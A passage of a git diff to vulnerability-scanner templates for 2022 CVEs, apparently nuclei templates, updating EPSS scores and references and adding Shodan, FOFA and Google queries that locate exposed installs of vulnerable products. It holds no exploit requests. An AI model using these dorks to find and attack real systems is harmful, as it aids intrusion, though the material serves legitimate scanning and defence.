cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index c60b1f9c37..622ea8f31c 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -28,6 +28,9 @@ info: product: wp_statistics framework: wordpress google-query: inurl:/wp-content/plugins/wp-statistics + publicwww-query: /wp-content/plugins/wp-statistics/ + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index 3ee911d449..a39264b6c3 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25149 cwe-id: CWE-89 - epss-score: 0.36793 - epss-percentile: 0.97067 + epss-score: 0.26955 + epss-percentile: 0.96764 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,9 @@ info: product: wp_statistics framework: wordpress publicwww-query: "/wp-content/plugins/wp-statistics/" + google-query: inurl:/wp-content/plugins/wp-statistics + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index e76bdcc221..d7cb89b2fb 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25216 cwe-id: CWE-22 epss-score: 0.01345 - epss-percentile: 0.85828 + epss-percentile: 0.86086 cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index ebf9e285b9..edb2633bde 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2022-25323 cwe-id: CWE-79 epss-score: 0.00115 - epss-percentile: 0.45093 + epss-percentile: 0.45082 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof product: web_server + shodan-query: cpe:"cpe:2.3:a:google:web_server" tags: cve,cve2022,xss,zerof http: diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 1f9bd68c13..255b0eb855 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -26,6 +26,8 @@ info: product: searchwp_live_ajax_search framework: wordpress publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" + shodan-query: http.html:/wp-content/plugins/searchwp-live-ajax-search/ + fofa-query: body=/wp-content/plugins/searchwp-live-ajax-search/ tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp http: diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 318df7ba5a..3bb3c6a4b9 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-25356 cwe-id: CWE-91 epss-score: 0.00425 - epss-percentile: 0.73853 + epss-percentile: 0.74252 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index a8a68d14b5..1585e86903 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2546 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.64447 + epss-percentile: 0.6506 cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 98eb3f6fa7..209f223789 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-25481 cwe-id: CWE-668 epss-score: 0.01261 - epss-percentile: 0.85321 + epss-percentile: 0.85591 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: thinkphp product: thinkphp shodan-query: title:"ThinkPHP" + fofa-query: title="thinkphp" + google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,exposure,oss http: diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 5fe7a52c5e..49c1685267 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25487 cwe-id: CWE-434 - epss-score: 0.84615 - epss-percentile: 0.98422 + epss-score: 0.78706 + epss-percentile: 0.98263 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true @@ -29,7 +29,6 @@ info: vendor: thedigitalcraft product: atomcms tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload - variables: string: "CVE-2022-25487" diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index 65ad5f3dce..ae416a1bbe 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25489 cwe-id: CWE-79 epss-score: 0.00134 - epss-percentile: 0.47681 + epss-percentile: 0.48559 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index e52fbf3495..9873fbef5f 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25497 cwe-id: CWE-552 epss-score: 0.00508 - epss-percentile: 0.76089 + epss-percentile: 0.7649 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 5f74137a15..e0943c18f4 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2551 cwe-id: CWE-425 - epss-score: 0.72442 - epss-percentile: 0.97997 + epss-score: 0.66448 + epss-percentile: 0.97927 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index 69e144b774..e9d1ab7748 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -10,13 +10,15 @@ info: - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/ - https://github.com/ccrisan/motioneye/issues/2292 - https://nvd.nist.gov/vuln/detail/cve-2022-25568 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25568 cwe-id: CWE-1188 - epss-score: 0.01838 - epss-percentile: 0.86962 + epss-score: 0.01501 + epss-percentile: 0.86918 cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +26,7 @@ info: vendor: motioneye_project product: motioneye shodan-query: html:"MotionEye" + fofa-query: body="motioneye" tags: cve,cve2022,motioneye,config,motioneye_project http: diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 9c2c7a2a42..4cd1769995 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2599 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index f674d3e63d..0b720ebdf2 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-26134 cwe-id: CWE-917 epss-score: 0.97528 - epss-percentile: 0.9999 + epss-percentile: 0.99992 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian http: diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index 10f5282faf..ef8f87f412 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26138 cwe-id: CWE-798 - epss-score: 0.97262 - epss-percentile: 0.99834 + epss-score: 0.97208 + epss-percentile: 0.99826 cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index da8a297eb5..e8e00bbee9 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -30,6 +30,7 @@ info: product: grafana shodan-query: title:"Grafana" fofa-query: app="Grafana" + google-query: intitle:"grafana" tags: cve,cve2022,grafana,zabbix,exposure http: diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 5ac643025e..9f70167191 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -14,13 +14,14 @@ info: - http://seclists.org/fulldisclosure/2022/Apr/0 - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-26233 cwe-id: CWE-22 - epss-score: 0.00654 - epss-percentile: 0.77223 + epss-score: 0.00628 + epss-percentile: 0.78973 cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 4bf2343e61..184bb6a231 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2627 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45193 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: newspaper framework: wordpress publicwww-query: "/wp-content/themes/Newspaper" + shodan-query: http.html:/wp-content/themes/newspaper + fofa-query: body=/wp-content/themes/newspaper tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv http: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 9c61ad1df1..3020195c6b 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26352 cwe-id: CWE-22 - epss-score: 0.97527 - epss-percentile: 0.99989 + epss-score: 0.97476 + epss-percentile: 0.99967 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dotcms product: dotcms + shodan-query: http.title:"dotcms" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive http: diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 0dcca515bd..a5456732af 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2022-26564 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39401 + epss-percentile: 0.40567 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 vendor: digitaldruid product: hoteldruid shodan-query: http.favicon.hash:-1521640213 + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve,cve2022,hoteldruid,xss,digitaldruid http: diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index b20f2cee89..09b54bd0a5 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-26833 cwe-id: CWE-306 epss-score: 0.0166 - epss-percentile: 0.87336 + epss-percentile: 0.8759 cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index e231a5d9bb..14498c83d0 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-26960 cwe-id: CWE-22 - epss-score: 0.85922 - epss-percentile: 0.98481 + epss-score: 0.84507 + epss-percentile: 0.98501 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index a699662226..eb1dc1072b 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -28,6 +28,8 @@ info: vendor: open-emr product: openemr shodan-query: title:"OpenEMR" + fofa-query: icon_hash=1971268439 + google-query: intitle:"openemr" tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr http: diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 7aa6b01048..56de6e769d 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -28,6 +28,8 @@ info: vendor: kavitareader product: kavita shodan-query: title:"kavita" + fofa-query: title="kavita" + google-query: intitle:"kavita" tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader http: diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 7ac8e90f4b..0af9290eb8 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -30,6 +30,8 @@ info: vendor: qnap product: photo_station shodan-query: title:"QNAP" + fofa-query: title="photo station" + google-query: intitle:"qnap" tags: cve2022,cve,qnap,lfi,kev http: diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 4009339caa..1ee4a12aa3 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -15,19 +15,22 @@ info: - https://wiki.zimbra.com/wiki/Security_Center - https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24 - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-27926 cwe-id: CWE-79 - epss-score: 0.91614 - epss-percentile: 0.98683 + epss-score: 0.96153 + epss-percentile: 0.99504 cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zimbra product: collaboration + fofa-query: app="zimbra-邮件系统" + shodan-query: http.favicon.hash:"1624375939" tags: cve,cve2022,zimbra,xss,kev http: diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index c5e0cd719c..d37c37737c 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28023 cwe-id: CWE-89 - epss-score: 0.02266 - epss-percentile: 0.8936 + epss-score: 0.0161 + epss-percentile: 0.87425 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index dab4e32a34..9d865a26ec 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28032 cwe-id: CWE-89 - epss-score: 0.02266 - epss-percentile: 0.8936 + epss-score: 0.0161 + epss-percentile: 0.87425 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 111b5db77c..c4d4251323 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28079 cwe-id: CWE-89 - epss-score: 0.80212 - epss-percentile: 0.98029 + epss-score: 0.68173 + epss-percentile: 0.97965 cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 9076309976..3866b93571 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28080 cwe-id: CWE-89 - epss-score: 0.01461 - epss-percentile: 0.86424 + epss-score: 0.01814 + epss-percentile: 0.88161 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index f38137a1ca..72823ef3e3 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -15,13 +15,14 @@ info: - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5 - https://www.youtube.com/watch?v=4kHW95CMfD0 - https://nvd.nist.gov/vuln/detail/CVE-2022-28117 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N cvss-score: 4.9 cve-id: CVE-2022-28117 cwe-id: CWE-918 - epss-score: 0.03193 - epss-percentile: 0.9018 + epss-score: 0.04745 + epss-percentile: 0.92658 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 1d27898b64..9b756bc315 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -23,8 +23,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28219 cwe-id: CWE-611 - epss-score: 0.97392 - epss-percentile: 0.99909 + epss-score: 0.97453 + epss-percentile: 0.9995 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: verified: true @@ -32,6 +32,8 @@ info: vendor: zohocorp product: manageengine_adaudit_plus shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" + google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp http: diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index c610bcd0dc..f5b8472aed 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -21,13 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28363 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61062 + epss-score: 0.00336 + epss-percentile: 0.71252 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: reprisesoftware product: reprise_license_manager + shodan-query: http.html:"reprise license" + fofa-query: body="reprise license manager" + google-query: inurl:"/goforms/menu" tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware http: diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 36bde738a1..11c85365ba 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -21,13 +21,16 @@ info: cvss-score: 5.3 cve-id: CVE-2022-28365 cwe-id: CWE-425 - epss-score: 0.00689 - epss-percentile: 0.77964 + epss-score: 0.05306 + epss-percentile: 0.93052 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: reprisesoftware product: reprise_license_manager + shodan-query: http.html:"reprise license" + fofa-query: body="reprise license manager" + google-query: inurl:"/goforms/menu" tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware http: diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 4a90bb1dea..5ba768a99d 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.9 cve-id: CVE-2022-2863 cwe-id: CWE-22 - epss-score: 0.43289 - epss-percentile: 0.97257 + epss-score: 0.46632 + epss-percentile: 0.97438 cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 03e70e6f8d..ece6c2a890 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -30,6 +30,7 @@ info: vendor: dlink product: dir-816l_firmware shodan-query: http.html:"DIR-816L" + fofa-query: body="dir-816l" tags: cve2022,cve,dlink,exposure http: diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index a46c5f606e..b89b7124a5 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29004 cwe-id: CWE-79 - epss-score: 0.00218 - epss-percentile: 0.59134 + epss-score: 0.00254 + epss-percentile: 0.65186 cpe: cpe:2.3:a:phpgurukul:e-diary_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 20ab18725f..60bada6a89 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29005 cwe-id: CWE-79 - epss-score: 0.0015 - epss-percentile: 0.51178 + epss-score: 0.00205 + epss-percentile: 0.58459 cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 9c23d4c891..3aa3bf5b6e 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29006 cwe-id: CWE-89 - epss-score: 0.21257 - epss-percentile: 0.96305 + epss-score: 0.1338 + epss-percentile: 0.95581 cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 40eb33f1f7..10e67c06fc 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29007 cwe-id: CWE-89 - epss-score: 0.15861 - epss-percentile: 0.95469 + epss-score: 0.1338 + epss-percentile: 0.95581 cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index a752cb053f..8ac7e7ccac 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29009 cwe-id: CWE-89 - epss-score: 0.21257 - epss-percentile: 0.96305 + epss-score: 0.1338 + epss-percentile: 0.95581 cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml index bdf099ede5..27c001979f 100644 --- a/http/cves/2022/CVE-2022-29013.yaml +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -14,13 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29013 cwe-id: CWE-78 - epss-score: 0.83254 - epss-percentile: 0.98361 - cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* + epss-score: 0.8792 + epss-percentile: 0.98658 + cpe: cpe:2.3:h:razer:sila:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: razer - product: sila_firmware + product: sila tags: packetstorm,cve,cve2022,razer,sila,router http: diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 6fd1794a52..e1b06ad89f 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29014 - epss-score: 0.77285 - epss-percentile: 0.98135 + epss-score: 0.79802 + epss-percentile: 0.9829 cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 05c6a4b16d..9154676875 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29078 cwe-id: CWE-94 - epss-score: 0.34849 - epss-percentile: 0.97005 + epss-score: 0.28707 + epss-percentile: 0.96859 cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index cde1288f15..e0f0a073a9 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -29,6 +29,8 @@ info: vendor: hashicorp product: consul shodan-query: title:"Consul by HashiCorp" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: cve,cve2022,consul,hashicorp,ssrf,intrusive http: diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 0db78ac075..3b6365097a 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ 